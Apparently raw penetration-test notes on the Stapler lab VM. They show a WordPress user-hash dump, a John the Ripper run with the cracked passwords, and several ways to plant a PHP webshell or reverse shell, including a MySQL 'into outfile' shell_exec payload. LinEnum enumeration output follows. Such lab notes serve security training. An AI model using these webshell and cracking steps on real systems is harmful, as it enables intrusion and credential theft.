== Dumping data for table wp_users
------------------------------------------
|1|John|$P$B7889EMq/erHIuZapMB8GEizebcIy9.|john|john@red.localhost|http://localhost|2016-06-03 23:18:47| |0|John Smith
|2|Elly|$P$BlumbJRRBit7y50Y17.UPJ/xEgv4my0|elly|Elly@red.localhost| |2016-06-05 16:11:33| |0|Elly Jones
|3|Peter|$P$BTzoYuAFiBA5ixX2njL0XcLzu67sGD0|peter|peter@red.localhost| |2016-06-05 16:13:16| |0|Peter Parker
|4|barry|$P$BIp1ND3G70AnRAkRY41vpVypsTfZhk0|barry|barry@red.localhost| |2016-06-05 16:14:26| |0|Barry Atkins
|5|heather|$P$Bwd0VpK8hX4aN.rZ14WDdhEIGeJgf10|heather|heather@red.localhost| |2016-06-05 16:18:04| |0|Heather Neville
|6|garry|$P$BzjfKAHd6N4cHKiugLX.4aLes8PxnZ1|garry|garry@red.localhost| |2016-06-05 16:18:23| |0|garry
|7|harry|$P$BqV.SQ6OtKhVV7k7h1wqESkMh41buR0|harry|harry@red.localhost| |2016-06-05 16:18:41| |0|harry
|8|scott|$P$BFmSPiDX1fChKRsytp1yp8Jo7RdHeI1|scott|scott@red.localhost| |2016-06-05 16:18:59| |0|scott
|9|kathy|$P$BZlxAMnC6ON.PYaurLGrhfBi6TjtcA0|kathy|kathy@red.localhost| |2016-06-05 16:19:14| |0|kathy
|10|tim|$P$BXDR7dLIJczwfuExJdpQqRsNf.9ueN0|tim|tim@red.localhost| |2016-06-05 16:19:29| |0|tim
|11|ZOE|$P$B.gMMKRP11QOdT5m1s9mstAUEDjagu1|zoe|zoe@red.localhost| |2016-06-05 16:19:50| |0|ZOE
|12|Dave|$P$Bl7/V9Lqvu37jJT.6t4KWmY.v907Hy.|dave|dave@red.localhost| |2016-06-05 16:20:09| |0|Dave
|13|Simon|$P$BLxdiNNRP008kOQ.jE44CjSK/7tEcz0|simon|simon@red.localhost| |2016-06-05 16:20:35| |0|Simon
|14|Abby|$P$ByZg5mTBpKiLZ5KxhhRe/uqR.48ofs.|abby|abby@red.localhost| |2016-06-05 16:20:53| |0|Abby
|15|Vicki|$P$B85lqQ1Wwl2SqcPOuKDvxaSwodTY131|vicki|vicki@red.localhost| |2016-06-05 16:21:14| |0|Vicki
|16|Pam|$P$BuLagypsIJdEuzMkf20XyS5bRm00dQ0|pam|pam@red.localhost| |2016-06-05 16:42:23| |0|Pam
|17|555-555-0199@example.com|$P$BRAtWrA5VMIQLDnYxPuWP1zqcQxSM61|555-555-0199example-com|winter@example.com| |2018-07-22 17:14:22| |0|555-555-0199@example.com



cassage de mot de passe avec John et rockyou
============================================

John:$P$B7889EMq/erHIuZapMB8GEizebcIy9.
Elly:$P$BlumbJRRBit7y50Y17.UPJ/xEgv4my0
Peter:$P$BTzoYuAFiBA5ixX2njL0XcLzu67sGD0
barry:$P$BIp1ND3G70AnRAkRY41vpVypsTfZhk0
heather:$P$Bwd0VpK8hX4aN.rZ14WDdhEIGeJgf10
garry:$P$BzjfKAHd6N4cHKiugLX.4aLes8PxnZ1
harry:$P$BqV.SQ6OtKhVV7k7h1wqESkMh41buR0
scott:$P$BFmSPiDX1fChKRsytp1yp8Jo7RdHeI1
kathy:$P$BZlxAMnC6ON.PYaurLGrhfBi6TjtcA0
tim:$P$BXDR7dLIJczwfuExJdpQqRsNf.9ueN0
ZOE:$P$B.gMMKRP11QOdT5m1s9mstAUEDjagu1
Dave:$P$Bl7/V9Lqvu37jJT.6t4KWmY.v907Hy.
Simon:$P$BLxdiNNRP008kOQ.jE44CjSK/7tEcz0
Abby:$P$ByZg5mTBpKiLZ5KxhhRe/uqR.48ofs.
Vicki:$P$B85lqQ1Wwl2SqcPOuKDvxaSwodTY131
Pam:$P$BuLagypsIJdEuzMkf20XyS5bRm00dQ0

root@Security-Audit-01:~/Desktop/Stapler/Wordpress# john --wordlist=/usr/share/wordlists/rockyou.txt wp_users-pwd.txt 
Created directory: /root/.john
Using default input encoding: UTF-8
Loaded 16 password hashes with 16 different salts (phpass [phpass ($P$ or $H$) 128/128 AVX 4x3])
Press 'q' or Ctrl-C to abort, almost any other key for status
football         (garry)
monkey           (harry)
cookie           (scott)
coolgirl         (kathy)
4g 0:00:02:25 0.36% (ETA: 06:38:53) 0.02740g/s 430.4p/s 5178c/s 5178C/s 22121989..198809
washere          (barry)
5g 0:00:05:56 0.96% (ETA: 05:51:01) 0.01400g/s 459.0p/s 5346c/s 5346C/s 240327..22abril
incorrect        (John)
thumb            (tim)
0520             (Pam)
8g 0:00:14:28 2.62% (ETA: 04:47:17) 0.009206g/s 502.2p/s 5063c/s 5063C/s accomplish..abigail2001
8g 0:00:27:25 5.37% (ETA: 04:05:16) 0.004860g/s 535.1p/s 4832c/s 4832C/s link34..ling1314
8g 0:00:31:36 6.36% (ETA: 03:51:42) 0.004217g/s 545.7p/s 4844c/s 4844C/s aeroman..aekoriginal21
passphrase       (heather)
damachine        (Dave)
ylle             (Elly)
11g 0:01:11:28 18.70% (ETA: 01:57:03) 0.002564g/s 675.4p/s 4961c/s 4961C/s vicehill205..vice_city
11g 0:01:13:25 19.59% (ETA: 01:49:44) 0.002496g/s 686.2p/s 4973c/s 4973C/s twister4689..twister01
partyqueen       (ZOE)
12g 0:02:05:43 49.17% (ETA: 23:50:33) 0.001590g/s 948.3p/s 5328c/s 5328C/s jasamsuki1..jasamine.
Use the "--show" option to display all of the cracked passwords reliably
Session aborted


Connexion au WP en tant qu'admin

Ajout d'une backdoor  
::::::::::::::::::::

option A - manuellement en éditant les themes
=============================================
 > Apparances > Editor > Archive.php
> $wget http://pentestmonkey.net/tools/php-reverse-shell/php-reverse-shell-1.0.tar.gz
> $tar -xzf php-reverse-shell-1.0.tar.gz
> $cat php-reverse-shell-1.0/php-reverse-shell.php

option b - automatique avec metasploit
======================================
exploit/unix/webapp/wp_admin_shell_upload


option c -pseudo manual
======================
https://192.168.1.28:12380/blogblog/wp-admin/plugin-install.php?tab=upload
on upload directement le fichier PHP et non un zip et il sera téléchargé dans 
le répertoire "/wp-content/uploads/webshell.php"

https://github.com/wetw0rk/malicious-wordpress-plugin




option d - upload a webshell using phpmyadmin or mysql
======================================================

Select "<?php echo shell_exec($_GET['cmd']);?>" into outfile "/var/www/https/blogblog/wp-content/uploads/shell.php";


root@kali:~# mysql -uroot -pplbkac -h 192.168.1.32
Warning: Using a password on the command line interface can be insecure.
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 6
Server version: 5.7.12-0ubuntu1 (Ubuntu)

Copyright (c) 2000, 2016, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> Select "<?php echo shell_exec($_GET['cmd']);?>" into outfile "/var/www/https/blogblog/wp-content/uploads/shell.php";
Query OK, 1 row affected (0.00 sec)

mysql> exit
Bye
root@kali:~#






===================================================================================================================================
Step 3. Linux enumeration (LinEnum.sh + Linux-exploit-suggester.sh + Searchsploit)
===================================================================================================================================

$./linEnum.sh -t

[#########################################################
[# Local Linux Enumeration & Privilege Escalation Script [#
[#########################################################
# www.rebootuser.com
# version 0.91

[-] Debug Info
[+] Thorough tests = Enabled


Scan started at:
Sun 22 Jul 22:09:59 BST 2018


### SYSTEM ##############################################
[[-] Kernel information:
Linux red.initech 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:34:49 UTC 2016 i686 i686 i686 GNU/Linux


[[-] Kernel information (continued):
Linux version 4.4.0-21-generic (buildd@lgw01-06) (gcc version 5.3.1 20160413 (Ubuntu 5.3.1-14ubuntu2) ) #37-Ubuntu SMP Mon Apr 18 18:34:49 UTC 2016


[[-] Specific release information:
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=16.04
DISTRIB_CODENAME=xenial
DISTRIB_DESCRIPTION="Ubuntu 16.04 LTS"
NAME="Ubuntu"
VERSION="16.04 LTS (Xenial Xerus)"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 16.04 LTS"
VERSION_ID="16.04"
HOME_URL="http://www.ubuntu.com/"
SUPPORT_URL="http://help.ubuntu.com/"
BUG_REPORT_URL="http://bugs.launchpad.net/ubuntu/"
UBUNTU_CODENAME=xenial


[[-] Hostname:
red.initech


### USER/GROUP ##########################################
[[-] Current user/group info:
uid=1026(zoe) gid=1026(zoe) groups=1026(zoe)


[[-] Users that have previously logged onto the system:
Username         Port     From             Latest
root                                       Thu Jan  1 01:00:10 +0100 1970
LSolum           pts/0    192.168.1.9      Sun Jul 22 21:18:09 +0100 2018
zoe              pts/0    192.168.1.9      Sun Jul 22 22:09:14 +0100 2018


[[-] Who else is logged on:
 22:09:59 up  4:39,  1 user,  load average: 0.00, 0.01, 0.05
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
zoe      pts/0    192.168.1.9      22:09    7.00s  0.00s  0.00s /bin/bash ./LinEnum.sh -t


[[-] Group memberships:
uid=0(root) gid=0(root) groups=0(root)
uid=1(daemon) gid=1(daemon) groups=1(daemon)
uid=2(bin) gid=2(bin) groups=2(bin)
uid=3(sys) gid=3(sys) groups=3(sys)
uid=4(sync) gid=65534(nogroup) groups=65534(nogroup)
uid=5(games) gid=60(games) groups=60(games)
uid=6(man) gid=12(man) groups=12(man)
uid=7(lp) gid=7(lp) groups=7(lp)
uid=8(mail) gid=8(mail) groups=8(mail)
uid=9(news) gid=9(news) groups=9(news)
uid=10(uucp) gid=10(uucp) groups=10(uucp)
uid=13(proxy) gid=13(proxy) groups=13(proxy)
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uid=34(backup) gid=34(backup) groups=34(backup)
uid=38(list) gid=38(list) groups=38(list)
uid=39(irc) gid=39(irc) groups=39(irc)
uid=41(gnats) gid=41(gnats) groups=41(gnats)
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
uid=100(systemd-timesync) gid=102(systemd-timesync) groups=102(systemd-timesync)
uid=101(systemd-network) gid=103(systemd-network) groups=103(systemd-network)
uid=102(systemd-resolve) gid=104(systemd-resolve) groups=104(systemd-resolve)
uid=103(systemd-bus-proxy) gid=105(systemd-bus-proxy) groups=105(systemd-bus-proxy)
uid=104(syslog) gid=108(syslog) groups=108(syslog),4(adm)
uid=105(_apt) gid=65534(nogroup) groups=65534(nogroup)
uid=106(lxd) gid=65534(nogroup) groups=65534(nogroup)
uid=107(dnsmasq) gid=65534(nogroup) groups=65534(nogroup)
uid=108(messagebus) gid=111(messagebus) groups=111(messagebus)
uid=109(sshd) gid=65534(nogroup) groups=65534(nogroup)
uid=1000(peter) gid=1000(peter) groups=1000(peter),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),113(lpadmin),114(sambashare)
uid=111(mysql) gid=117(mysql) groups=117(mysql)
uid=1001(RNunemaker) gid=1001(RNunemaker) groups=1001(RNunemaker)
uid=1002(ETollefson) gid=1002(ETollefson) groups=1002(ETollefson)
uid=1003(DSwanger) gid=1003(DSwanger) groups=1003(DSwanger)
uid=1004(AParnell) gid=1004(AParnell) groups=1004(AParnell)
uid=1005(SHayslett) gid=1005(SHayslett) groups=1005(SHayslett)
uid=1006(MBassin) gid=1006(MBassin) groups=1006(MBassin)
uid=1007(JBare) gid=1007(JBare) groups=1007(JBare)
uid=1008(LSolum) gid=1008(LSolum) groups=1008(LSolum)
uid=1009(IChadwick) gid=1009(IChadwick) groups=1009(IChadwick)
uid=1010(MFrei) gid=1010(MFrei) groups=1010(MFrei)
uid=1011(SStroud) gid=1011(SStroud) groups=1011(SStroud)
uid=1012(CCeaser) gid=1012(CCeaser) groups=1012(CCeaser)
uid=1013(JKanode) gid=1013(JKanode) groups=1013(JKanode)
uid=1014(CJoo) gid=1014(CJoo) groups=1014(CJoo)
uid=1015(Eeth) gid=1015(Eeth) groups=1015(Eeth)
uid=1016(LSolum2) gid=1016(LSolum2) groups=1016(LSolum2)
uid=1017(JLipps) gid=1017(JLipps) groups=1017(JLipps)
uid=1018(jamie) gid=1018(jamie) groups=1018(jamie)
uid=1019(Sam) gid=1019(Sam) groups=1019(Sam)
uid=1020(Drew) gid=1020(Drew) groups=1020(Drew)
uid=1021(jess) gid=1021(jess) groups=1021(jess)
uid=1022(SHAY) gid=1022(SHAY) groups=1022(SHAY)
uid=1023(Taylor) gid=1023(Taylor) groups=1023(Taylor)
uid=1024(mel) gid=1024(mel) groups=1024(mel)
uid=1025(kai) gid=1025(kai) groups=1025(kai)
uid=1026(zoe) gid=1026(zoe) groups=1026(zoe)
uid=1027(NATHAN) gid=1027(NATHAN) groups=1027(NATHAN)
uid=1028(www) gid=1028(www) groups=1028(www)
uid=112(postfix) gid=118(postfix) groups=118(postfix)
uid=110(ftp) gid=116(ftp) groups=116(ftp)
uid=1029(elly) gid=1029(elly) groups=1029(elly)


[[-] It looks like we have some admin users:
uid=104(syslog) gid=108(syslog) groups=108(syslog),4(adm)
uid=1000(peter) gid=1000(peter) groups=1000(peter),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),113(lpadmin),114(sambashare)


[[-] Contents of /etc/passwd:
root:x:0:0:root:/root:/bin/zsh
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
lxd:x:106:65534::/var/lib/lxd/:/bin/false
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/bin/false
messagebus:x:108:111::/var/run/dbus:/bin/false
sshd:x:109:65534::/var/run/sshd:/usr/sbin/nologin
peter:x:1000:1000:Peter,,,:/home/peter:/bin/zsh
mysql:x:111:117:MySQL Server,,,:/nonexistent:/bin/false
RNunemaker:x:1001:1001::/home/RNunemaker:/bin/bash
ETollefson:x:1002:1002::/home/ETollefson:/bin/bash
DSwanger:x:1003:1003::/home/DSwanger:/bin/bash
AParnell:x:1004:1004::/home/AParnell:/bin/bash
SHayslett:x:1005:1005::/home/SHayslett:/bin/bash
MBassin:x:1006:1006::/home/MBassin:/bin/bash
JBare:x:1007:1007::/home/JBare:/bin/bash
LSolum:x:1008:1008::/home/LSolum:/bin/bash
IChadwick:x:1009:1009::/home/IChadwick:/bin/false
MFrei:x:1010:1010::/home/MFrei:/bin/bash
SStroud:x:1011:1011::/home/SStroud:/bin/bash
CCeaser:x:1012:1012::/home/CCeaser:/bin/dash
JKanode:x:1013:1013::/home/JKanode:/bin/bash
CJoo:x:1014:1014::/home/CJoo:/bin/bash
Eeth:x:1015:1015::/home/Eeth:/usr/sbin/nologin
LSolum2:x:1016:1016::/home/LSolum2:/usr/sbin/nologin
JLipps:x:1017:1017::/home/JLipps:/bin/sh
jamie:x:1018:1018::/home/jamie:/bin/sh
Sam:x:1019:1019::/home/Sam:/bin/zsh
Drew:x:1020:1020::/home/Drew:/bin/bash
jess:x:1021:1021::/home/jess:/bin/bash
SHAY:x:1022:1022::/home/SHAY:/bin/bash
Taylor:x:1023:1023::/home/Taylor:/bin/sh
mel:x:1024:1024::/home/mel:/bin/bash
kai:x:1025:1025::/home/kai:/bin/sh
zoe:x:1026:1026::/home/zoe:/bin/bash
NATHAN:x:1027:1027::/home/NATHAN:/bin/bash
www:x:1028:1028::/home/www:
postfix:x:112:118::/var/spool/postfix:/bin/false
ftp:x:110:116:ftp daemon,,,:/var/ftp:/bin/false
elly:x:1029:1029::/home/elly:/bin/bash


[[-] Super user account(s):
root


[[-] Accounts that have recently used sudo:
/home/peter/.sudo_as_admin_successful


[[-] Are permissions on /home directories lax:
total 128K
drwxr-xr-x 32 root       root       4.0K Jun  4  2016 .
drwxr-xr-x 22 root       root       4.0K Jun  7  2016 ..
drwxr-xr-x  2 AParnell   AParnell   4.0K Jun  5  2016 AParnell
drwxr-xr-x  2 CCeaser    CCeaser    4.0K Jun  5  2016 CCeaser
drwxr-xr-x  2 CJoo       CJoo       4.0K Jun  5  2016 CJoo
drwxr-xr-x  2 Drew       Drew       4.0K Jun  5  2016 Drew
drwxr-xr-x  2 DSwanger   DSwanger   4.0K Jun  5  2016 DSwanger
drwxr-xr-x  2 Eeth       Eeth       4.0K Jun  5  2016 Eeth
drwxr-xr-x  2 elly       elly       4.0K Jun  5  2016 elly
drwxr-xr-x  2 ETollefson ETollefson 4.0K Jun  5  2016 ETollefson
drwxr-xr-x  2 IChadwick  IChadwick  4.0K Jun  5  2016 IChadwick
drwxr-xr-x  2 jamie      jamie      4.0K Jun  5  2016 jamie
drwxr-xr-x  2 JBare      JBare      4.0K Jun  5  2016 JBare
drwxr-xr-x  2 jess       jess       4.0K Jun  5  2016 jess
drwxr-xr-x  2 JKanode    JKanode    4.0K Jun  5  2016 JKanode
drwxr-xr-x  2 JLipps     JLipps     4.0K Jun  5  2016 JLipps
drwxr-xr-x  2 kai        kai        4.0K Jun  5  2016 kai
drwxr-xr-x  3 LSolum     LSolum     4.0K Jul 22 21:13 LSolum
drwxr-xr-x  2 LSolum2    LSolum2    4.0K Jun  5  2016 LSolum2
drwxr-xr-x  2 MBassin    MBassin    4.0K Jun  5  2016 MBassin
drwxr-xr-x  2 mel        mel        4.0K Jun  5  2016 mel
drwxr-xr-x  2 MFrei      MFrei      4.0K Jun  5  2016 MFrei
drwxr-xr-x  2 NATHAN     NATHAN     4.0K Jun  5  2016 NATHAN
drwxr-xr-x  3 peter      peter      4.0K Jun  3  2016 peter
drwxr-xr-x  2 RNunemaker RNunemaker 4.0K Jun  5  2016 RNunemaker
drwxr-xr-x  2 Sam        Sam        4.0K Jun  5  2016 Sam
drwxr-xr-x  2 SHAY       SHAY       4.0K Jun  5  2016 SHAY
drwxr-xr-x  3 SHayslett  SHayslett  4.0K Jul 22 21:12 SHayslett
drwxr-xr-x  2 SStroud    SStroud    4.0K Jun  5  2016 SStroud
drwxr-xr-x  2 Taylor     Taylor     4.0K Jun  5  2016 Taylor
drwxrwxrwx  2 www        www        4.0K Jul 22 21:52 www
drwxr-xr-x  3 zoe        zoe        4.0K Jul 22 21:13 zoe


[[-] Files not owned by user but writable by group:
-rw-rw-rw- 1 www-data www-data 1885 Jul 22 21:38 /var/www/https/blogblog/wp-content/uploads/malicous.zip
-rw-rw-rw- 1 www-data www-data 1524 Jul 22 21:27 /var/www/https/blogblog/wp-content/uploads/RKmIVQPEJZ.zip
-rwxrwxrwx 1 www www 0 Jun  3  2016 /etc/authbind/byport/80
-rwxrwxrwx 1 root root 51 Jun  3  2016 /usr/local/sbin/cron-logrotate.sh


[[-] Files owned by our user:
-rw-r--r-- 1 zoe zoe 0 Jul 22 22:10 /var/lib/lxcfs/cgroup/name=systemd/user.slice/user-1026.slice/user@1026.service/tasks
-rw-r--r-- 1 zoe zoe 0 Jul 22 22:10 /var/lib/lxcfs/cgroup/name=systemd/user.slice/user-1026.slice/user@1026.service/cgroup.procs
-rw-r--r-- 1 zoe zoe 0 Jul 22 22:10 /var/lib/lxcfs/cgroup/name=systemd/user.slice/user-1026.slice/user@1026.service/init.scope/tasks
-rw-r--r-- 1 zoe zoe 0 Jul 22 22:10 /var/lib/lxcfs/cgroup/name=systemd/user.slice/user-1026.slice/user@1026.service/init.scope/cgroup.procs
-rw-r--r-- 1 zoe zoe 0 Jul 22 22:10 /var/lib/lxcfs/cgroup/name=systemd/user.slice/user-1026.slice/user@1026.service/init.scope/cgroup.clone_children
-rw-r--r-- 1 zoe zoe 0 Jul 22 22:10 /var/lib/lxcfs/cgroup/name=systemd/user.slice/user-1026.slice/user@1026.service/init.scope/notify_on_release
-rw-rw-r-- 1 zoe zoe 11116 Jul 22 22:10 /tmp/LinEnum-results.txt
-rw-r--r-- 1 zoe zoe 65666 Jul 22 22:08 /tmp/Linux-exploit-suggester.sh
-rwxr-xr-x 1 zoe zoe 44413 Jul 22 22:08 /tmp/LinEnum.sh
-rwx------ 1 zoe zoe 5491 Jul 22 22:04 /tmp/php-reverse-shell.php
-rw-r--r-- 1 zoe zoe 3771 Sep  1  2015 /home/zoe/.bashrc
-rw-r--r-- 1 zoe zoe 0 Jul 22 21:13 /home/zoe/.cache/motd.legal-displayed
-rw-r--r-- 1 zoe zoe 220 Sep  1  2015 /home/zoe/.bash_logout
-rw-r--r-- 1 zoe zoe 675 Sep  1  2015 /home/zoe/.profile


[[-] Hidden files:
-rw-r--r-- 1 root root 344 Nov 12  2015 /var/www/https/blogblog/wp-content/plugins/shortcode-ui/.jshintrc
-rw-r--r-- 1 root root 616 Jun  3  2016 /var/www/https/blogblog/wp-content/plugins/akismet/.htaccess
-rw-r--r-- 1 root root 92 Jun  4  2016 /var/www/https/.htaccess
-rw-r--r-- 1 root root 1182 Jun  3  2016 /var/lib/apparmor/profiles/.apparmor.md5sums
-rw-r--r-- 1 root root 102 Apr  5  2016 /etc/cron.daily/.placeholder
-rw-r--r-- 1 root root 102 Apr  5  2016 /etc/cron.hourly/.placeholder
-rw-r--r-- 1 root root 3771 Sep  1  2015 /etc/skel/.bashrc
-rw-r--r-- 1 root root 220 Sep  1  2015 /etc/skel/.bash_logout
-rw-r--r-- 1 root root 675 Sep  1  2015 /etc/skel/.profile
-rw-r--r-- 1 root root 102 Apr  5  2016 /etc/cron.monthly/.placeholder
-rw------- 1 root root 0 Apr 20  2016 /etc/.pwd.lock
-rw-r--r-- 1 root root 102 Apr  5  2016 /etc/cron.weekly/.placeholder
-rw-r--r-- 1 root root 102 Jun  3  2016 /etc/cron.d/.placeholder
-rw-r--r-- 1 root root 1228 Jun  6  2016 /etc/init.d/.depend.boot
-rw-r--r-- 1 root root 1375 Jun  6  2016 /etc/init.d/.depend.start
-rw-r--r-- 1 root root 1653 Jun  6  2016 /etc/init.d/.depend.stop
-rw-r--r-- 1 root root 0 Mar 29  2016 /usr/share/php/.lock
-rw-r--r-- 1 root root 2439 Mar 29  2016 /usr/share/php/.depdb
-rw-r--r-- 1 root root 7080 Mar 29  2016 /usr/share/php/.filemap
-rw-r--r-- 1 root root 0 Mar 29  2016 /usr/share/php/.depdblock
-rw-r--r-- 1 root root 292 Apr 18  2016 /usr/src/linux-headers-4.4.0-21-generic/arch/x86/include/generated/asm/.syscalls_32.h.cmd
-rw-r--r-- 1 root root 402 Apr 18  2016 /usr/src/linux-headers-4.4.0-21-generic/arch/x86/include/generated/asm/.xen-hypercalls.h.cmd
-rw-r--r-- 1 root root 320 Apr 18  2016 /usr/src/linux-headers-4.4.0-21-generic/arch/x86/include/generated/uapi/asm/.unistd_64.h.cmd
-rw-r--r-- 1 root root 315 Apr 18  2016 /usr/src/linux-headers-4.4.0-21-generic/arch/x86/include/generated/uapi/asm/.unistd_32.h.cmd
-rw-r--r-- 1 root root 340 Apr 18  2016 /usr/src/linux-headers-4.4.0-21-generic/arch/x86/include/generated/uapi/asm/.unistd_x32.h.cmd
-rw-r--r-- 1 root root 3262 Apr 18  2016 /usr/src/linux-headers-4.4.0-21-generic/arch/x86/tools/.relocs_common.o.cmd
-rw-r--r-- 1 root root 146 Apr 18  2016 /usr/src/linux-headers-4.4.0-21-generic/arch/x86/tools/.relocs.cmd
-rw-r--r-- 1 root root 3282 Apr 18  2016 /usr/src/linux-headers-4.4.0-21-generic/arch/x86/tools/.relocs_32.o.cmd
-rw-r--r-- 1 root root 3282 Apr 18  2016 /usr/src/linux-headers-4.4.0-21-generic/arch/x86/tools/.relocs_64.o.cmd
-rw-r--r-- 1 root root 53316 Apr 18  2016 /usr/src/linux-headers-4.4.0-21-generic/arch/x86/kernel/.asm-offsets.s.cmd
-rw-r--r-- 1 root root 110 Apr 18  2016 /usr/src/linux-headers-4.4.0-21-generic/scripts/kconfig/.conf.cmd
-rw-r--r-- 1 root root 4815 Apr 18  2016 /usr/src/linux-headers-4.4.0-21-generic/scripts/kconfig/.zconf.tab.o.cmd
-rw-r--r-- 1 root root 3671 Apr 18  2016 /usr/src/linux-headers-4.4.0-21-generic/scripts/kconfig/.conf.o.cmd
-rw-r--r-- 1 root root 3291 Apr 18  2016 /usr/src/linux-headers-4.4.0-21-generic/scripts/.recordmcount.cmd
-rw-r--r-- 1 root root 4510 Apr 18  2016 /usr/src/linux-headers-4.4.0-21-generic/scripts/mod/.modpost.o.cmd
-rw-r--r-- 1 root root 2469 Apr 18  2016 /usr/src/linux-headers-4.4.0-21-generic/scripts/mod/.mk_elfconfig.cmd
-rw-r--r-- 1 root root 5082 Apr 18  2016 /usr/src/linux-headers-4.4.0-21-generic/scripts/mod/.devicetable-offsets.s.cmd
-rw-r--r-- 1 root root 2133 Apr 18  2016 /usr/src/linux-headers-4.4.0-21-generic/scripts/mod/.empty.o.cmd
-rw-r--r-- 1 root root 104 Apr 18  2016 /usr/src/linux-headers-4.4.0-21-generic/scripts/mod/.elfconfig.h.cmd
-rw-r--r-- 1 root root 546 Apr 18  2016 /usr/src/linux-headers-4.4.0-21-generic/scripts/mod/.devicetable-offsets.h.cmd
-rw-r--r-- 1 root root 129 Apr 18  2016 /usr/src/linux-headers-4.4.0-21-generic/scripts/mod/.modpost.cmd
-rw-r--r-- 1 root root 3391 Apr 18  2016 /usr/src/linux-headers-4.4.0-21-generic/scripts/mod/.file2alias.o.cmd
-rw-r--r-- 1 root root 4325 Apr 18  2016 /usr/src/linux-headers-4.4.0-21-generic/scripts/mod/.sumversion.o.cmd
-rw-r--r-- 1 root root 3165 Apr 18  2016 /usr/src/linux-headers-4.4.0-21-generic/scripts/selinux/genheaders/.genheaders.cmd
-rw-r--r-- 1 root root 2769 Apr 18  2016 /usr/src/linux-headers-4.4.0-21-generic/scripts/selinux/mdp/.mdp.cmd
-rw-r--r-- 1 root root 2318 Apr 18  2016 /usr/src/linux-headers-4.4.0-21-generic/scripts/.kallsyms.cmd
-rw-r--r-- 1 root root 2419 Apr 18  2016 /usr/src/linux-headers-4.4.0-21-generic/scripts/genksyms/.parse.tab.o.cmd
-rw-r--r-- 1 root root 2649 Apr 18  2016 /usr/src/linux-headers-4.4.0-21-generic/scripts/genksyms/.genksyms.o.cmd
-rw-r--r-- 1 root root 153 Apr 18  2016 /usr/src/linux-headers-4.4.0-21-generic/scripts/genksyms/.genksyms.cmd
-rw-r--r-- 1 root root 3263 Apr 18  2016 /usr/src/linux-headers-4.4.0-21-generic/scripts/genksyms/.lex.lex.o.cmd
-rw-r--r-- 1 root root 3167 Apr 18  2016 /usr/src/linux-headers-4.4.0-21-generic/scripts/.asn1_compiler.cmd
-rw-r--r-- 1 root root 1169 Apr 18  2016 /usr/src/linux-headers-4.4.0-21-generic/scripts/basic/.bin2c.cmd
-rw-r--r-- 1 root root 4148 Apr 18  2016 /usr/src/linux-headers-4.4.0-21-generic/scripts/basic/.fixdep.cmd
-rw-r--r-- 1 root root 2329 Apr 18  2016 /usr/src/linux-headers-4.4.0-21-generic/scripts/.conmakehash.cmd
-rw-r--r-- 1 root root 3860 Apr 18  2016 /usr/src/linux-headers-4.4.0-21-generic/scripts/.insert-sys-cert.cmd
-rw-r--r-- 1 root root 4439 Apr 18  2016 /usr/src/linux-headers-4.4.0-21-generic/scripts/.extract-cert.cmd
-rw-r--r-- 1 root root 3472 Apr 18  2016 /usr/src/linux-headers-4.4.0-21-generic/scripts/.sortextable.cmd
-rw-r--r-- 1 root root 5057 Apr 18  2016 /usr/src/linux-headers-4.4.0-21-generic/scripts/.sign-file.cmd
-rw-r--r-- 1 root root 14232 Apr 18  2016 /usr/src/linux-headers-4.4.0-21-generic/kernel/.bounds.s.cmd
-rw-r--r-- 1 root root 192787 Apr 18  2016 /usr/src/linux-headers-4.4.0-21-generic/.config
-rw-r--r-- 1 root root 770 Apr 18  2016 /usr/src/linux-headers-4.4.0-21-generic/.missing-syscalls.d
-rw-r--r-- 1 root root 192911 Apr 18  2016 /usr/src/linux-headers-4.4.0-21-generic/.config.old
-rw-r--r-- 1 root root 12 Jan 10  2016 /usr/src/linux-headers-4.4.0-22/scripts/gdb/linux/.gitignore
-rw-r--r-- 1 root root 167 Jan 10  2016 /usr/src/linux-headers-4.4.0-22/scripts/kconfig/.gitignore
-rw-r--r-- 1 root root 31 Jan 10  2016 /usr/src/linux-headers-4.4.0-22/scripts/kconfig/lxdialog/.gitignore
-rw-r--r-- 1 root root 55 Jan 10  2016 /usr/src/linux-headers-4.4.0-22/scripts/mod/.gitignore
-rw-r--r-- 1 root root 11 Jan 10  2016 /usr/src/linux-headers-4.4.0-22/scripts/selinux/genheaders/.gitignore
